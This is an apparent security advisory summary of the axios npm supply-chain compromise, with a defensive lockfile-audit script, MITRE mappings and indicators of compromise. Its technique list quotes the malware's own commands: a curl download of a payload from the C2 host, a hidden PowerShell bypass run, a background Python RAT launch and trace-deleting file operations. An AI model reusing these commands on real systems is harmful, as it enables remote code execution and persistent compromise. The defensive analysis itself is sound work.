On March 31, 2026, an attacker hijacked an axios npm maintainer account and published malicious releases (axios@1.14.1 and 0.30.4) that added a typosquatted dependency, plain-crypto-js, whose install script executed a cross-platform RAT during npm install. The compromise was active for about three hours before npm removed the packages. The RAT communicated with the C2 host sfrclak[.]com and delivered macOS, Windows, and Linux payloads (all containing bugs); maintainers and npm revoked tokens and applied further mitigations. #axios #plain-crypto-js
Keypoints
- On 2026-03-31 an attacker published malicious axios@1.14.1 (tagged latest) and axios@0.30.4 after compromising a maintainer account, exposing users whose dependency specs floated to the new patch release instead of pinning an exact version.
- The malicious releases added a typosquatted dependency, plain-crypto-js, whose postinstall script downloaded and executed a platform-specific RAT from http://sfrclak[.]com:8000/6202033.
- The attack window lasted roughly 00:21–03:25 UTC (≈3 hours) before npm replaced the malicious package and removed the compromised axios versions; axios has millions of weekly downloads and many dependents.
- All RAT variants shared one C2 protocol: HTTP POST with a hardcoded IE8 User-Agent. Each sent an initial directory listing (FirstInfo) and supported commands such as runscript and peinject; every variant contained bugs that limited functionality or persistence.
- The attacker published directly from the compromised account (the npm metadata lacks trustedPublisher / OIDC attestation, so the publish did not come from a trusted CI publisher), and maintainer account metadata showed the maintainer email changed to an attacker-controlled address.
- Mitigations included npm token revocation, removal of compromised versions, maintainer deprecation workflow, and telemetry-based hunting queries for package/library installations and C2 indicators.
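The last keypoint mentions hunting for package installations. The following is an added example (not code from the Datadog article or from the axios project) of the dependency-side check: it audits a package-lock.json for the two compromised axios versions and for the plain-crypto-js dependency, flags packages that declare install-time scripts, and lists package.json specs that float rather than pin. It assumes npm's lockfile layouts (v1 nested "dependencies", v2/v3 flat "packages" keyed by node_modules path, with npm's hasInstallScript flag); the sample lockfile and package.json are constructed, and the plain-crypto-js version in them is a placeholder because the summary does not record it.

```python
"""Audit an npm project for the axios supply-chain compromise described above.

Checks a package-lock.json (lockfile v1, v2 or v3 layouts) for the two
malicious axios releases and for the typosquatted plain-crypto-js dependency,
and reports package.json specs that float rather than pin an exact version.
"""
import re
from typing import Any, Iterator

# Package names and versions taken from the advisory summary above.
MALICIOUS_AXIOS_VERSIONS = {"1.14.1", "0.30.4"}
TYPOSQUAT_PACKAGE = "plain-crypto-js"

# Exact semver, optionally prefixed with "=" (npm treats both as pinned).
PINNED_SPEC = re.compile(r"=?\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?")


def _lock_entries(lock: dict[str, Any]) -> Iterator[tuple[str, str, bool]]:
    """Yield (name, version, has_install_script) for every locked package."""
    if "packages" in lock:
        # lockfileVersion 2/3: flat map keyed by a path such as "node_modules/axios".
        for path, meta in lock["packages"].items():
            if not path:  # "" describes the root project, not a dependency
                continue
            name = path.rsplit("node_modules/", 1)[-1]
            # npm sets hasInstallScript when a package has (pre|post)install hooks.
            yield name, meta.get("version", ""), bool(meta.get("hasInstallScript"))
    else:
        # lockfileVersion 1: nested "dependencies" tree (no install-script flag recorded).
        stack = [lock.get("dependencies", {})]
        while stack:
            for name, meta in stack.pop().items():
                yield name, meta.get("version", ""), False
                stack.append(meta.get("dependencies", {}))


def audit_lockfile(lock: dict[str, Any]) -> list[dict[str, str]]:
    """Return findings: critical for compromised packages, info for install scripts."""
    findings = []
    for name, version, has_install_script in _lock_entries(lock):
        if name == "axios" and version in MALICIOUS_AXIOS_VERSIONS:
            findings.append({"severity": "critical", "package": f"axios@{version}",
                             "reason": "compromised axios release"})
        elif name == TYPOSQUAT_PACKAGE:
            findings.append({"severity": "critical", "package": f"{name}@{version}",
                             "reason": "typosquatted dependency added by the malicious axios releases"})
        elif has_install_script:
            # Install hooks are how the malicious dependency ran its RAT loader; worth review.
            findings.append({"severity": "info", "package": f"{name}@{version}",
                             "reason": "declares an install-time script"})
    return findings


def floating_specs(package_json: dict[str, Any]) -> dict[str, str]:
    """Return dependency specs (e.g. ^1.14.0) that would pull a newer patch release."""
    floating = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in package_json.get(section, {}).items():
            if not PINNED_SPEC.fullmatch(spec.strip()):
                floating[name] = spec
    return floating


# Constructed sample inputs (not real project files); the plain-crypto-js version is a placeholder.
SAMPLE_PACKAGE_JSON = {"dependencies": {"axios": "^1.14.0", "lodash": "4.17.21"}}
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": SAMPLE_PACKAGE_JSON["dependencies"]},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/plain-crypto-js": {"version": "0.0.0-placeholder", "hasInstallScript": True},
        "node_modules/lodash": {"version": "4.17.21"},
    },
}

if __name__ == "__main__":
    for f in audit_lockfile(SAMPLE_LOCK):
        print(f"[{f['severity']}] {f['package']}: {f['reason']}")
    for name, spec in floating_specs(SAMPLE_PACKAGE_JSON).items():
        print(f"[warn] {name} spec {spec!r} is not pinned to an exact version")
```

Run it against a real tree with `json.load(open("package-lock.json"))` in place of SAMPLE_LOCK. The floating-spec report is the preventive half of the check: a `^1.14.0` spec is exactly what let a fresh install pick up 1.14.1 during the three-hour window.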
MITRE Techniques
- [T1195] Supply Chain Compromise – The attacker hijacked a maintainer account and published malicious package versions to the npm registry (‘an attacker compromised the npm account of an axios maintainer and published two malicious patch releases: 1.14.1 and 0.30.4.’).
- [T1078] Valid Accounts – The adversary used a compromised npm/GitHub maintainer account session to publish packages and delete issue reports (‘the 1.14.1 snapshot shows the attacker’s email address’ and ‘the attacker deleted them’).
- [T1105] Ingress Tool Transfer – The postinstall script fetched stage-two payloads from a remote C2 and wrote them to disk for execution (‘curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033’).
- [T1059] Command and Scripting Interpreter – The attack used multiple scripting interpreters (Node.js postinstall, PowerShell, Python, AppleScript) to execute commands and payloads (‘postinstall’: ‘node setup.js’; PowerShell and Python download-and-execute snippets in setup.js).
- [T1059.001] PowerShell – The Windows payload executed a downloaded PowerShell script with execution policy bypass and used PowerShell to collect info and establish persistence (‘%PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1’).
- [T1059.006] Python – The Linux payload was a Python RAT invoked via nohup and exhibited beaconing and FirstInfo exfiltration (‘nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &’).
- [T1027] Obfuscated Files or Information – setup.js used layered string transformations (reverse, base64, XOR) to hide URLs and commands (‘_trans_2("__gvEvKx", "OrDeR_7077")’ and deobfuscation functions).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – The Windows PowerShell payload created a Run key and a system.bat to persist on user login (‘registers it under the MicrosoftUpdate Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run’).
- [T1070.004] Indicator Removal on Host: File Deletion – The installer removed traces of the postinstall hook and replaced package.json to cover its tracks (‘fs.unlink(__filename); fs.unlink("package.json"); fs.rename("package.md", "package.json");’).
- [T1071.001] Application Layer Protocol: Web Protocols – The RAT used HTTP POST to communicate with the C2 endpoint and transmit base64-encoded JSON with a hardcoded User-Agent (‘HTTP POST to sfrclak[.]com:8000/6202033 with base64-encoded JSON bodies and a hardcoded IE8 User-Agent string’).
Indicators of Compromise
- [Domain] C2 domain – sfrclak[.]com (registered 2026-03-30 via Namecheap)
- [IPv4] C2 A record – 142.11.206.73 (A record for sfrclak[.]com)
- [URL] Stage-2 download and C2 endpoint – http://sfrclak[.]com:8000/6202033
- [User-Agent] Hardcoded RAT UA – ‘mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)’
- [npm package] Malicious packages and affected versions – axios@1.14.1, axios@0.30.4; plain-crypto-js (the dependency those releases added)
- [File hash] Platform payload hashes – macOS Mach-O: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a, Windows PowerShell: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (and 1 more hash)
- [File path] Notable dropped files/artifacts – /Library/Caches/com.apple.act.mond (macOS binary), %PROGRAMDATA%\system.bat (Windows persistence), and /tmp/ld.py (Linux payload)
- [Email] Attacker/compromised maintainer emails – (address not preserved in this copy) (axios publisher snapshot), (address not preserved in this copy) (plain-crypto-js publisher reported by StepSecurity)
- [Build artifacts] Developer artifacts leaked in macOS binary – Xcode project name ‘macWebT’ and development path ‘/Users/mac/Desktop/Jain_DEV/client_mac/macWebT/’
Read more: https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/